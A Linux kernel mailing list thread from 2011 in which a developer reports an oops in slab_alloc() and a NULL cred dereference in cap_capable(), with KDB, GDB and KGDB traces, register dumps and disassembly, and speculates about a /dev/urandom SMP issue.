All of lore.kernel.org
 help / color / mirror / Atom feed
* Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
@ 2011-05-23 14:48 Robert Święcki
       [not found] ` <BANLkTikey3L4doiHY=__=690TZNsXqRHUQ@mail.gmail.com>
  0 siblings, 1 reply; 9+ messages in thread
From: Robert Święcki @ 2011-05-23 14:48 UTC (permalink / raw)
  To: linux-kernel

Happens under 2.6.39-rc4.

Here's probably more readable version (without lines being wrapped):
http://alt.swiecki.net/linux_kernel/sys_open-kmem_cache_alloc-2.6.39-rc4.txt

The most interesting part is probably the KGDB one. I'm still
debugging, but in case others might figure it out faster, attaching my
analysis here. The initial observation is that values in 'filp_cachep'
are incorrect.

============================================================================
KDB:
============================================================================

Stack traceback for pid 11235
0xffff88011ae91720    11235    11878  1    1   R  0xffff88011ae91ba0 *killall
<c> ffff88011ae1dd48<c> 0000000000000018<c> ffffffff8111ed78<c>
ffff88012bc4e280<c>
<c> ffff88012bffbe00<c> 0000000000000001<c> ffff88011ae1de48<c>
ffff880107947900<c>
<c> 0000000000000001<c> ffff88011ae1df28<c> ffff88010374e000<c>
ffff88011ae1dda8<c>
Call Trace:
 [<ffffffff8111ed78>] ? release_pages+0x16f/0x181
 [<ffffffff81162e5f>] ? get_empty_filp+0x6b/0x11f
 [<ffffffff8116cca7>] ? path_openat+0x33/0x345
 [<ffffffff8116cff1>] ? do_filp_open+0x38/0x86
 [<ffffffff8108a703>] ? get_parent_ip+0x11/0x41
 [<ffffffff8108a703>] ? get_parent_ip+0x11/0x41
 [<ffffffff8108a87c>] ? sub_preempt_count+0x97/0xaa
 [<ffffffff81ed24cd>] ? _raw_spin_unlock+0x2d/0x38
 [<ffffffff811781a1>] ? alloc_fd+0x10b/0x11d
 [<ffffffff8116127b>] ? do_sys_open+0x6e/0x100
 [<ffffffff8116132d>] ? sys_open+0x20/0x22
 [<ffffffff81ed3582>] ? system_call_fastpath+0x16/0x1b

---> *killall

sysname    Linux
release    2.6.39-rc4
version    #2 SMP PREEMPT Tue May 10 20:39:51 CEST 2011
machine    x86_64
nodename   ise-test
domainname (none)
ccversion  CCVERSION
date       2011-05-22 07:01:01 tz_minuteswest -120
uptime     11 days 12:13
load avg   19.87 22.44 23.24

MemTotal:         993069 kB
MemFree:          130318 kB
Buffers:           44686 kB


<1>[994415.765292] BUG: unable to handle kernel paging request at
00000000ffffffff
<1>[994415.766002] IP: [<ffffffff81150e83>] kmem_cache_alloc+0x57/0xe7
<4>[994415.766002] PGD 10a3ba067 PUD 0
<0>[994415.766002] Oops: 0000 [#1] PREEMPT SMP
<0>[994415.766002] last sysfs file:
/sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map


Entering kdb (current=0xffff88011ae91720, pid 11235) on processor 1
due to cpu switch
[1]kdb> rd
ax: 0000000000000000  bx: ffff88011ae1de48  cx: ffff88011ae1df28
dx: 0000006c68931281  si: 0000006c68931281  di: ffffffff81162e5f
bp: ffff88011ae1dd88  sp: ffff88011ae1dd48  r8: 0000000000000041
r9: ffff88012074fa50  r10: 0000000000000000  r11: 0000000000000246
r12: 00000000ffffffff  r13: ffff88012b002300  r14: 00000000000080d0
r15: ffff88010374e000  ip: ffffffff81150e83  flags: 00010206  cs: 00000010
ss: 00000018

Code: 00 48 8b 50 08 4c 8b 20 4d 85 e4 75 16 48 89 f9 83 ca ff 44 89
f6 4c 89 ef e8 b0 fa ff ff 49 89 c4 eb 20 49 63 45 20 49 8b 75 00 <49>
8b 1c 04 48 8d 4a 40 4c 89 e0 65 48 0f c7 0e 0f 94 c0 90 84
All code
========
   0:	00 48 8b             	add    %cl,-0x75(%rax)
   3:	50                   	push   %rax
   4:	08 4c 8b 20          	or     %cl,0x20(%rbx,%rcx,4)
   8:	4d 85 e4             	test   %r12,%r12
   b:	75 16                	jne    0x23
   d:	48 89 f9             	mov    %rdi,%rcx
  10:	83 ca ff             	or     $0xffffffffffffffff,%edx
  13:	44 89 f6             	mov    %r14d,%esi
  16:	4c 89 ef             	mov    %r13,%rdi
  19:	e8 b0 fa ff ff       	callq  0xffffffffffffface
  1e:	49 89 c4             	mov    %rax,%r12
  21:	eb 20                	jmp    0x43
  23:	49 63 45 20          	movslq 0x20(%r13),%rax
  27:	49 8b 75 00          	mov    0x0(%r13),%rsi
  2b:*	49 8b 1c 04          	mov    (%r12,%rax,1),%rbx     <--
trapping instruction
  2f:	48 8d 4a 40          	lea    0x40(%rdx),%rcx
  33:	4c 89 e0             	mov    %r12,%rax
  36:	65 48 0f c7 0e       	cmpxchg16b %gs:(%rsi)
  3b:	0f 94 c0             	sete   %al
  3e:	90                   	nop
  3f:	84                   	.byte 0x84

Code starting with the faulting instruction
===========================================
   0:	49 8b 1c 04          	mov    (%r12,%rax,1),%rbx
   4:	48 8d 4a 40          	lea    0x40(%rdx),%rcx
   8:	4c 89 e0             	mov    %r12,%rax
   b:	65 48 0f c7 0e       	cmpxchg16b %gs:(%rsi)
  10:	0f 94 c0             	sete   %al
  13:	90                   	nop
  14:	84                   	.byte 0x84






============================================================================
GDB:
============================================================================
(gdb) disassemble 0xffffffff81150e83
Dump of assembler code for function kmem_cache_alloc:
   0xffffffff81150e2c <+0>:	push   rbp
   0xffffffff81150e2d <+1>:	mov    rbp,rsp
   0xffffffff81150e30 <+4>:	push   r15
   0xffffffff81150e32 <+6>:	push   r14
   0xffffffff81150e34 <+8>:	push   r13
   0xffffffff81150e36 <+10>:	push   r12
   0xffffffff81150e38 <+12>:	push   rbx
   0xffffffff81150e39 <+13>:	sub    rsp,0x18
   0xffffffff81150e3d <+17>:	call   0xffffffff81ed32c0
   0xffffffff81150e42 <+22>:	mov    r13,rdi
   0xffffffff81150e45 <+25>:	mov    r14d,esi
   0xffffffff81150e48 <+28>:	mov    rdi,QWORD PTR [rbp+0x8]
   0xffffffff81150e4c <+32>:	mov    rax,QWORD PTR [r13+0x0]
   0xffffffff81150e50 <+36>:	add    rax,QWORD PTR gs:0xdd40
   0xffffffff81150e59 <+45>:	mov    rdx,QWORD PTR [rax+0x8]
   0xffffffff81150e5d <+49>:	mov    r12,QWORD PTR [rax]
   0xffffffff81150e60 <+52>:	test   r12,r12
   0xffffffff81150e63 <+55>:	jne    0xffffffff81150e7b <kmem_cache_alloc+79>
   0xffffffff81150e65 <+57>:	mov    rcx,rdi
   0xffffffff81150e68 <+60>:	or     edx,0xffffffffffffffff
   0xffffffff81150e6b <+63>:	mov    esi,r14d
   0xffffffff81150e6e <+66>:	mov    rdi,r13
   0xffffffff81150e71 <+69>:	call   0xffffffff81150926 <__slab_alloc>
   0xffffffff81150e76 <+74>:	mov    r12,rax
   0xffffffff81150e79 <+77>:	jmp    0xffffffff81150e9b <kmem_cache_alloc+111>
   0xffffffff81150e7b <+79>:	movsxd rax,DWORD PTR [r13+0x20]
   0xffffffff81150e7f <+83>:	mov    rsi,QWORD PTR [r13+0x0]
   0xffffffff81150e83 <+87>:	mov    rbx,QWORD PTR [r12+rax*1]
   0xffffffff81150e87 <+91>:	lea    rcx,[rdx+0x40]
   0xffffffff81150e8b <+95>:	mov    rax,r12
   0xffffffff81150e8e <+98>:	call   0xffffffff813d2c70
   0xffffffff81150e93 <+103>:	nop    DWORD PTR [rax+0x0]
   0xffffffff81150e97 <+107>:	test   al,al
---Type <return> to continue, or q <return> to quit---
   0xffffffff81150e99 <+109>:	je     0xffffffff81150e4c <kmem_cache_alloc+32>
   0xffffffff81150e9b <+111>:	test   r12,r12
   0xffffffff81150e9e <+114>:	je     0xffffffff81150eb4 <kmem_cache_alloc+136>
   0xffffffff81150ea0 <+116>:	test   r14d,0x8000
   0xffffffff81150ea7 <+123>:	je     0xffffffff81150eb4 <kmem_cache_alloc+136>
   0xffffffff81150ea9 <+125>:	movsxd rcx,DWORD PTR [r13+0x1c]
   0xffffffff81150ead <+129>:	xor    eax,eax
   0xffffffff81150eaf <+131>:	mov    rdi,r12
   0xffffffff81150eb2 <+134>:	rep stos BYTE PTR es:[rdi],al
   0xffffffff81150eb4 <+136>:	movsxd rax,DWORD PTR [r13+0x18]
   0xffffffff81150eb8 <+140>:	movsxd r15,DWORD PTR [r13+0x1c]
   0xffffffff81150ebc <+144>:	mov    QWORD PTR [rbp-0x38],rax
   0xffffffff81150ec0 <+148>:	mov    r13,QWORD PTR [rbp+0x8]
   0xffffffff81150ec4 <+152>:	jmp    0xffffffff81150ec9 <kmem_cache_alloc+157>
   0xffffffff81150ec9 <+157>:	jmp    0xffffffff81150f01 <kmem_cache_alloc+213>
   0xffffffff81150ecb <+159>:	call   0xffffffff8114dacf
<rcu_read_lock_sched_notrace>
   0xffffffff81150ed0 <+164>:	mov    rbx,QWORD PTR [rip+0x1abdfc9]
   # 0xffffffff82c0eea0
   0xffffffff81150ed7 <+171>:	test   rbx,rbx
   0xffffffff81150eda <+174>:	je     0xffffffff81150efc <kmem_cache_alloc+208>
   0xffffffff81150edc <+176>:	mov    rdi,QWORD PTR [rbx+0x8]
   0xffffffff81150ee0 <+180>:	mov    r9d,r14d
   0xffffffff81150ee3 <+183>:	mov    r8,QWORD PTR [rbp-0x38]
   0xffffffff81150ee7 <+187>:	mov    rcx,r15
   0xffffffff81150eea <+190>:	mov    rdx,r12
   0xffffffff81150eed <+193>:	mov    rsi,r13
   0xffffffff81150ef0 <+196>:	call   QWORD PTR [rbx]
   0xffffffff81150ef2 <+198>:	add    rbx,0x10
   0xffffffff81150ef6 <+202>:	cmp    QWORD PTR [rbx],0x0
   0xffffffff81150efa <+206>:	jmp    0xffffffff81150eda <kmem_cache_alloc+174>
   0xffffffff81150efc <+208>:	call   0xffffffff81150cb1
<rcu_read_unlock_sched_notrace>
   0xffffffff81150f01 <+213>:	add    rsp,0x18
   0xffffffff81150f05 <+217>:	mov    rax,r12
   0xffffffff81150f08 <+220>:	pop    rbx
   0xffffffff81150f09 <+221>:	pop    r12
---Type <return> to continue, or q <return> to quit---
   0xffffffff81150f0b <+223>:	pop    r13
   0xffffffff81150f0d <+225>:	pop    r14
   0xffffffff81150f0f <+227>:	pop    r15
   0xffffffff81150f11 <+229>:	leave
   0xffffffff81150f12 <+230>:	ret







============================================================================
KGDB:
============================================================================

(gdb) set remotebaud 115200
(gdb)  target remote /dev/ttyS0
Remote debugging using /dev/ttyS0
0xffffffff81150e83 in slab_alloc (s=0xffff88012b002300,
gfpflags=32976) at mm/slub.c:1943
1943			if (unlikely(!this_cpu_cmpxchg_double(
(gdb) bt
#0  0xffffffff81150e83 in slab_alloc (s=0xffff88012b002300,
gfpflags=32976) at mm/slub.c:1943
#1  kmem_cache_alloc (s=0xffff88012b002300, gfpflags=32976) at mm/slub.c:1971
#2  0xffffffff81162e5f in kmem_cache_zalloc () at include/linux/slab.h:310
#3  get_empty_filp () at fs/file_table.c:123
#4  0xffffffff8116cca7 in path_openat (dfd=<value optimized out>,
pathname=0xffff88010374e000 "/proc/1133/stat",
    nd=0xffff88011ae1de48, op=0xffff88011ae1df28, flags=<value
optimized out>) at fs/namei.c:2324
#5  0xffffffff8116cff1 in do_filp_open (dfd=-100,
pathname=0xffff88010374e000 "/proc/1133/stat",
    op=0xffff88011ae1df28, flags=1) at fs/namei.c:2380
#6  0xffffffff8116127b in do_sys_open (dfd=-100, filename=<value
optimized out>, flags=32768,
    mode=<value optimized out>) at fs/open.c:1001
#7  0xffffffff8116132d in sys_open (filename=<value optimized out>,
flags=<value optimized out>,
    mode=<value optimized out>) at fs/open.c:1022
#8  <signal handler called>
#9  0x00007f17ee73bff0 in __brk_reservation_fn_dmi_alloc__ ()
#10 0xffff880101141720 in __brk_reservation_fn_dmi_alloc__ ()
#11 0xffffffff82a1bb50 in ?? ()
#12 0x0000000200020000 in __brk_reservation_fn_dmi_alloc__ ()
#13 0x0000000300000001 in __brk_reservation_fn_dmi_alloc__ ()
#14 0x00007ffffffff000 in __brk_reservation_fn_dmi_alloc__ ()
#15 0xffffffff810a4b51 in sys_restart_syscall () at kernel/signal.c:2085
#16 0x0000000000000000 in ?? ()

(gdb) frame 0
#0  0xffffffff81150e83 in slab_alloc (s=0xffff88012b002300,
gfpflags=32976) at mm/slub.c:1943
1943			if (unlikely(!this_cpu_cmpxchg_double(
(gdb) list
1938			 * 3. If they were not changed replace tid and freelist
1939			 *
1940			 * Since this is without lock semantics the protection is only against
1941			 * code executing on this cpu *not* from access by other cpus.
1942			 */
1943			if (unlikely(!this_cpu_cmpxchg_double(
1944					s->cpu_slab->freelist, s->cpu_slab->tid,
1945					object, tid,
1946					get_freepointer(s, object), next_tid(tid)))) {
1947	

(gdb) x/i $pc
=> 0xffffffff81150e83 <kmem_cache_alloc+87>:	mov    rbx,QWORD PTR [r12+rax*1]

(gdb) info registers
rax            0x0	0
rbx            0xffff88011ae1de48	-131936649355704
rcx            0xffff88011ae1df28	-131936649355480
rdx            0x6c68931281	465610936961
rsi            0x6c68931281	465610936961
rdi            0xffffffff81162e5f	-2129252769
rbp            0xffff88011ae1dd88	0xffff88011ae1dd88
rsp            0xffff88011ae1dd48	0xffff88011ae1dd48
r8             0x41	65
r9             0xffff88012074fa50	-131936555828656
r10            0x0	0
r11            0x246	582
r12            0xffffffff	4294967295
r13            0xffff88012b002300	-131936378936576
r14            0x80d0	32976
r15            0xffff88010374e000	-131937042374656
rip            0xffffffff81150e83	0xffffffff81150e83 <kmem_cache_alloc+87>
eflags         0x10206	[ PF IF RF ]
cs             0x10	16
ss             0x18	24
ds             Could not fetch register "ds"; remote failure reply 'E22'

(gdb) p object
$36 = (void **) 0xffffffff

(gdb) p s
$1 = (struct kmem_cache *) 0xffff88012b002300
(gdb) p s->cpu_slab
$2 = (struct kmem_cache_cpu *) 0x15300

(gdb) p *s
$17 = {cpu_slab = 0x15300, flags = 0, min_partial = 7, size = 192,
objsize = 192, offset = 0, oo = {x = 21}, max = {
    x = 21}, min = {x = 21}, allocflags = 0, refcount = 13, ctor = 0,
inuse = 192, align = 8, reserved = 0,
  name = 0xffff88012b000010 "kmalloc-192", list = {next =
0xffff88012b002268, prev = 0xffff88012b002468}, kobj = {
    name = 0xffff880123c7c830 ":t-0000192", entry = {next =
0xffff88012b002280, prev = 0xffff88012b002480},
    parent = 0xffff8801249a74f8, kset = 0xffff8801249a74e0, ktype =
0xffffffff82a37790, sd = 0xffff880123ca6fa0,
    kref = {refcount = {counter = 1}}, state_initialized = 1,
state_in_sysfs = 1, state_add_uevent_sent = 1,
    state_remove_uevent_sent = 0, uevent_suppress = 0},
remote_node_defrag_ratio = 1000, node = {0xffff88012b0010c0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x15320, 0x0, 0x5, 0x800000008,
0x0, 0x200, 0x200, 0x200, 0x100000000, 0x0,
    0x800000008, 0x0, 0xffff88012b000020, 0xffff88012b002368,
0xffff88012b002568, 0xffff880123c7c800,
    0xffff88012b002380, 0xffff88012b002580, 0xffff8801249a74f8,
0xffff8801249a74e0, 0xffffffff82a37790,
    0xffff880123ca65f0, 0x700000001, 0x3e8, 0xffff88012b001100, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x15340, 0x0, 0x5,
    0x1000000010, 0x0, 0x100, 0x100, 0x100, 0x500000000, 0x0,
0x800000010, 0x0, 0xffff88012b000030,
    0xffff88012b002468, 0xffff88012b002668, 0xffff880123c7c7d0,
0xffff88012b002480, 0xffff88012b002680,
    0xffff8801249a74f8, 0xffff8801249a74e0, 0xffffffff82a37790,
0xffff880123ca5c30, 0x700000001, 0x3e8}}

(gdb) p/x tid
$20 = 0x6c68931281

(gdb) up
#1  kmem_cache_alloc (s=0xffff88012b002300, gfpflags=32976) at mm/slub.c:1971
1971		void *ret = slab_alloc(s, gfpflags, NUMA_NO_NODE, _RET_IP_);
(gdb) up
#2  0xffffffff81162e5f in kmem_cache_zalloc () at include/linux/slab.h:310
310		return kmem_cache_alloc(k, flags | __GFP_ZERO);
(gdb) up
#3  get_empty_filp () at fs/file_table.c:123
123		f = kmem_cache_zalloc(filp_cachep, GFP_KERNEL);

(gdb) p filp_cachep             (/note/ filp_cachep == 's' from slab_alloc())
$37 = (struct kmem_cache *) 0xffff88012b002300
(gdb) p *filp_cachep
$38 = {cpu_slab = 0x15300, flags = 0, min_partial = 7, size = 192,
objsize = 192, offset = 0, oo = {x = 21}, max = {
    x = 21}, min = {x = 21}, allocflags = 0, refcount = 13, ctor = 0,
inuse = 192, align = 8, reserved = 0,
  name = 0xffff88012b000010 "kmalloc-192", list = {next =
0xffff88012b002268, prev = 0xffff88012b002468}, kobj = {
    name = 0xffff880123c7c830 ":t-0000192", entry = {next =
0xffff88012b002280, prev = 0xffff88012b002480},
    parent = 0xffff8801249a74f8, kset = 0xffff8801249a74e0, ktype =
0xffffffff82a37790, sd = 0xffff880123ca6fa0,
    kref = {refcount = {counter = 1}}, state_initialized = 1,
state_in_sysfs = 1, state_add_uevent_sent = 1,
    state_remove_uevent_sent = 0, uevent_suppress = 0},
remote_node_defrag_ratio = 1000, node = {0xffff88012b0010c0,
    0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x15320, 0x0, 0x5, 0x800000008,
0x0, 0x200, 0x200, 0x200, 0x100000000, 0x0,
    0x800000008, 0x0, 0xffff88012b000020, 0xffff88012b002368,
0xffff88012b002568, 0xffff880123c7c800,
    0xffff88012b002380, 0xffff88012b002580, 0xffff8801249a74f8,
0xffff8801249a74e0, 0xffffffff82a37790,
    0xffff880123ca65f0, 0x700000001, 0x3e8, 0xffff88012b001100, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x15340, 0x0, 0x5,
    0x1000000010, 0x0, 0x100, 0x100, 0x100, 0x500000000, 0x0,
0x800000010, 0x0, 0xffff88012b000030,
    0xffff88012b002468, 0xffff88012b002668, 0xffff880123c7c7d0,
0xffff88012b002480, 0xffff88012b002680,
    0xffff8801249a74f8, 0xffff8801249a74e0, 0xffffffff82a37790,
0xffff880123ca5c30, 0x700000001, 0x3e8}}

(gdb) p *cred  (it's 'killall' running from uid 0)
$46 = {usage = {counter = 116}, uid = 0, gid = 0, suid = 0, sgid = 0,
euid = 0, egid = 0, fsuid = 0, fsgid = 0,
  securebits = 0, cap_inheritable = {cap = {0, 0}}, cap_permitted =
{cap = {4294967295, 4294967295}}, cap_effective = {
    cap = {4294967295, 4294967295}}, cap_bset = {cap = {4294967295,
4294967295}}, jit_keyring = 0 '\000',
  thread_keyring = 0x0, request_key_auth = 0x0, tgcred =
0xffff88011c49f040, security = 0xffff8801076cc0c0,
  user = 0xffffffff82a21b20, group_info = 0xffff88009fb61540, rcu =
{next = 0x0, func = 0}}

-- 
Robert Święcki

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: Fwd: Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
       [not found]   ` <alpine.DEB.2.00.1105231133580.29047@router.home>
@ 2011-05-23 18:28     ` Robert Święcki
  2011-05-24 19:52       ` Robert Święcki
  0 siblings, 1 reply; 9+ messages in thread
From: Robert Święcki @ 2011-05-23 18:28 UTC (permalink / raw)
  To: linux-kernel; +Cc: Christoph Lameter

On Mon, May 23, 2011 at 6:35 PM, Christoph Lameter <cl@linux.com> wrote:
> On Mon, 23 May 2011, Robert Święcki wrote:
>
>> Hi, not sure if it's related to SLUB, in any case forwarding.
>
> Please reboot with the kernel parameter slub_debug or enable
> CONFIG_SLUB_DEBUG_ON. The kernel will then verify all operations of the
> users of the allocator and log important issues to the syslog. This is
> likely some memory corruption.

So, I ran it with CONFIG_SLUB_DEBUG_ON and got Oops in just under a
second - the important thing is that probably that instead of
2.6.39-rc4 I ran 2.6.39

It was

<1>[   77.662935] BUG: unable to handle kernel NULL pointer
dereference at 0000000000000408
<1>[   77.663002] IP: [<ffffffff8134cbdf>] cap_capable+0x18/0x67
<4>[   77.663002] PGD 120428067 PUD 120e35067 PMD 0
<0>[   77.663002] Oops: 0000 [#1] PREEMPT SMP
<0>[   77.680925] last sysfs file:
/sys/devices/system/cpu/cpu1/cache/index2/shared_cpu_map

and kdb's backtrace shows:

[1]kdb> bt
Stack traceback for pid 8419
0xffff880120e3aee0     8419     8418  1    1   R  0xffff880120e3b360 *iknowthis2
<c> ffff88011f57deb8<c> 0000000000000000<c> ffff88011f5731a0<c>
ffff88011f57def8<c>
<c> ffffffff81378bfb<c> ffff88011f57ded8<c> ffff880120e3aee0<c>
0000000000000604<c>
<c> ffff88011f540500<c> 0000000000000000<c> 0000000000000000<c>
ffff88011f57df08<c>
Call Trace:
 [<ffffffff81378bfb>] ? apparmor_capable+0x27/0x61
 [<ffffffff8134d932>] ? security_capable+0x2a/0x2c
 [<ffffffff8109d99d>] ? ns_capable+0x3a/0x4f
 [<ffffffff8109da2b>] ? nsown_capable+0x24/0x29
 [<ffffffff810a6695>] ? sys_setgid+0x43/0x8d
 [<ffffffff810c1e11>] ? sys_setgid16+0x1c/0x1e
 [<ffffffff81ed6183>] ? ia32_do_call+0x13/0x13

and kgdb shows

(gdb) target remote /dev/ttyS0
Remote debugging using /dev/ttyS0
0xffffffff8134cbdf in cap_capable (tsk=<value optimized out>,
cred=0x0, targ_ns=0x0, cap=6, audit=1) at security/commoncap.c:88
88			if (targ_ns != &init_user_ns && targ_ns->creator == cred->user)

(gdb) p cred
$1 = (const struct cred *) 0x0

(gdb) bt
#0  0xffffffff8134cbdf in cap_capable (tsk=<value optimized out>,
cred=0x0, targ_ns=0x0, cap=6, audit=1) at security/commoncap.c:88
#1  0xffffffff81378bfb in apparmor_capable (task=0xffff880120e3aee0,
cred=0xffff88011f540500, ns=<value optimized out>, cap=6, audit=1) at
security/apparmor/lsm.c:144
#2  0xffffffff8134d932 in security_capable (ns=<value optimized out>,
cred=<value optimized out>, cap=<value optimized out>) at
security/security.c:160
#3  0xffffffff8109d99d in ns_capable (ns=<value optimized out>,
cap=<value optimized out>) at kernel/capability.c:381
#4  0xffffffff8109da2b in nsown_capable (cap=<value optimized out>) at
kernel/capability.c:412
#5  0xffffffff810a6695 in sys_setgid (gid=1540) at kernel/sys.c:570
#6  0xffffffff810c1e11 in sys_setgid16 (gid=<value optimized out>) at
kernel/uid16.c:53
#7  <signal handler called>
#8  0x0000000008065952 in __brk_reservation_fn_dmi_alloc__ ()

I looked through  apparmor_capable and cap_capable and there's nothing
that could change value of 'cred' from 0xffff880120e3aee0 to 0 between
apparmor_capable() and cap_capable()  (i.e. no buffer-overflow causing
functions, in fact no functions or no interesting operations at all).

Out of curiosity I looked at what runs on the other CPU, and it was:

[0]kdb> bt
Stack traceback for pid 23087
0xffff880120df8000    23087    16945  1    0   R  0xffff880120df8480 *iknowthis
<c> ffff880120d61c58<c> 0000000000000018<c>
Call Trace:
 <NMI>  <<EOE>>  [<ffffffff814feb2d>] ? extract_buf+0x5e/0x105
 [<ffffffff81ed3f85>] ? retint_restore_args+0x13/0x13
 [<ffffffff814fee11>] ? extract_entropy_user+0xb5/0x124
 [<ffffffff814fee95>] ? urandom_read+0x15/0x17
 [<ffffffff8116200b>] ? vfs_read+0xa9/0xfc
 [<ffffffff811633f5>] ? fget_light+0x42/0xa2
 [<ffffffff811622a6>] ? sys_read+0x4a/0x6e
 [<ffffffff81ed4902>] ? system_call_fastpath+0x16/0x1b

It's very strange, cause in the first case (the problem with SLUB),
the second CPU was also stuck in this routine, and I'm kinda certain
it is the real cause of the problem (it overwrites another CPU's
stack?). My config is here:
http://alt.swiecki.net/linux_kernel/ise-test-2.6.39-kernel-config.txt
- so the question is; could somebody more familiar with kernel
internals look into /dev/urandom sys_read routines. I think they don't
play nicely with SMP PREEMPT kernel (or maybe it just runs out of
kernel stack in there and overwrites another one). Some more data
about the second thread:

(gdb) thread 1
[Switching to thread 1 (Thread 23087)]#0  sha_transform
(digest=0xffff880120d61de8,
    in=0xffff880120d61ca8
"\372\223;4<;\030L\351\331_\345lI\206\362\202\364\373J\277\337\231ӌ!_(\206^\267\366\311\306\061R\001\v\b\322\312ګ\301\334:V\314p\226\253@\332m\206\271\025\361-\255f\027\340",
<incomplete sequence \364>, W=0xffff880120d61ca8) at lib/sha1.c:47
47			W[i+16] = rol32(W[i+13] ^ W[i+8] ^ W[i+2] ^ W[i], 1);

(gdb) bt
#0  sha_transform (digest=0xffff880120d61de8, in=0xffff880120d61ca8
"\372\223;4<;\030L\351\331_\345lI\206\362\202\364\373J\277\337\231ӌ!_(\206^\267\366\311\306\061R\001\v\b\322\312ګ\301\334:V\314p\226\253@\332m\206\271\025\361-\255f\027\340",
<incomplete sequence \364>,
    W=0xffff880120d61ca8) at lib/sha1.c:47
#1  0xffffffff814feb2d in extract_buf (r=0xffffffff82a88670,
out=0xffff880120d61e98 "\320S\032|\201\f7\215\333$") at
drivers/char/random.c:825
#2  0xffffffff814fee11 in extract_entropy_user (r=0xffffffff82a88670,
buf=0x7fec871ced98, nbytes=616) at drivers/char/random.c:910
#3  0xffffffff814fee95 in urandom_read (file=<value optimized out>,
buf=<value optimized out>, nbytes=<value optimized out>, ppos=<value
optimized out>) at drivers/char/random.c:1063
#4  0xffffffff8116200b in vfs_read (file=0xffff880121f13900,
    buf=0x7fec871ce000 ",\027\372\061\213L\224
\263\371\alx\304k\312O#\362\233\022\027\217\216\016\316
\212\022A`\213\264\246z$0=\313L<\253\221\367\264\246VF\350\336[a\372\v\367'\233\375\350\356\350\366\016\243wS\255fʦ\217\r\346k\354\235\335\031\333\335\030\246\061\332\312\020v\333\376\b\177-R]P\277\367\067M\230\324\235\026\264}\273Ƣ\264g\236\025\373\371\021a7tm\"f\313>I\003\346\214\006\255\"A\035\070\256\216\270t\002i\327\275\327G\031\227\017\337*\230H\376\256\a\376\t1XY\355*?{a\201s\272\023\060n\246\267\374\241/\205\037\330X\273\a[\300\220_\004#e\252B\326\370Kt(\306.D.\314\027"...,
count=<value optimized out>, pos=0xffff880120d61f58) at
fs/read_write.c:321
#5  0xffffffff811622a6 in sys_read (fd=<value optimized out>,
    buf=0x7fec871ce000 ",\027\372\061\213L\224
\263\371\alx\304k\312O#\362\233\022\027\217\216\016\316
\212\022A`\213\264\246z$0=\313L<\253\221\367\264\246VF\350\336[a\372\v\367'\233\375\350\356\350\366\016\243wS\255fʦ\217\r\346k\354\235\335\031\333\335\030\246\061\332\312\020v\333\376\b\177-R]P\277\367\067M\230\324\235\026\264}\273Ƣ\264g\236\025\373\371\021a7tm\"f\313>I\003\346\214\006\255\"A\035\070\256\216\270t\002i\327\275\327G\031\227\017\337*\230H\376\256\a\376\t1XY\355*?{a\201s\272\023\060n\246\267\374\241/\205\037\330X\273\a[\300\220_\004#e\252B\326\370Kt(\306.D.\314\027"...,
count=<value optimized out>) at fs/read_write.c:411
#6  <signal handler called>
#7  0x00007fec865e4340 in __brk_reservation_fn_dmi_alloc__ ()
#8  0xffff880120dc1770 in __brk_reservation_fn_dmi_alloc__ ()
#9  0xffffffff82a1bb50 in ?? ()
#10 0x0000000200020000 in __brk_reservation_fn_dmi_alloc__ ()
#11 0x0000000300000001 in __brk_reservation_fn_dmi_alloc__ ()
#12 0x00007ffffffff000 in __brk_reservation_fn_dmi_alloc__ ()
#13 0xffffffff810a4c3d in sys_restart_syscall () at kernel/signal.c:2085
#14 0x0000000000000000 in ?? ()

(gdb) info registers
rax            0xf21ac03a	4061839418
rbx            0xffff880120d61de8	-131936549462552
rcx            0x80	128
rdx            0xffff880120d61ca8	-131936549462872
rsi            0xffff880120d61ca8	-131936549462872
rdi            0xffff880120d61de8	-131936549462552
rbp            0xffff880120d61c98	0xffff880120d61c98
rsp            0xffff880120d61c58	0xffff880120d61c58
r8             0xbcc035f2	3166713330
r9             0x50	80
r10            0xffff880120d61cfc	-131936549462788
r11            0x47013d0b	1191263499
r12            0x10	16
r13            0xffffffff82a88670	-2102884752
r14            0xffff880120d61e98	-131936549462376
r15            0xa	10
rip            0xffffffff813d0297	0xffffffff813d0297 <sha_transform+39>
eflags         0x283	[ CF SF IF ]
cs             0x10	16
ss             0x18	24
ds             Could not fetch register "ds"; remote failure reply 'E22'

(gdb) disassemble $pc
Dump of assembler code for function sha_transform:
   0xffffffff813d0270 <+0>:	push   rbp
   0xffffffff813d0271 <+1>:	xor    eax,eax
   0xffffffff813d0273 <+3>:	mov    rbp,rsp
   0xffffffff813d0276 <+6>:	push   r15
   0xffffffff813d0278 <+8>:	push   r14
   0xffffffff813d027a <+10>:	push   r13
   0xffffffff813d027c <+12>:	push   r12
   0xffffffff813d027e <+14>:	push   rbx
   0xffffffff813d027f <+15>:	sub    rsp,0x18
   0xffffffff813d0283 <+19>:	mov    ecx,DWORD PTR [rsi+rax*1]
   0xffffffff813d0286 <+22>:	bswap  ecx
   0xffffffff813d0288 <+24>:	mov    DWORD PTR [rdx+rax*1],ecx
   0xffffffff813d028b <+27>:	add    rax,0x4
   0xffffffff813d028f <+31>:	cmp    rax,0x40
   0xffffffff813d0293 <+35>:	jne    0xffffffff813d0283 <sha_transform+19>
   0xffffffff813d0295 <+37>:	xor    ecx,ecx
=> 0xffffffff813d0297 <+39>:	mov    eax,DWORD PTR [rdx+rcx*1+0x20]
   0xffffffff813d029b <+43>:	xor    eax,DWORD PTR [rdx+rcx*1+0x34]
   0xffffffff813d029f <+47>:	xor    eax,DWORD PTR [rdx+rcx*1+0x8]
   0xffffffff813d02a3 <+51>:	xor    eax,DWORD PTR [rdx+rcx*1]
   0xffffffff813d02a6 <+54>:	ror    eax,0x1f
   0xffffffff813d02a9 <+57>:	mov    DWORD PTR [rdx+rcx*1+0x40],eax
   0xffffffff813d02ad <+61>:	add    rcx,0x4


-- 
Robert Święcki

^ permalink raw reply	[flat|nested] 9+ messages in thread

* Re: Fwd: Oops (bad memory deref) in slab_alloc() due to filp_cachep holding incorrect values
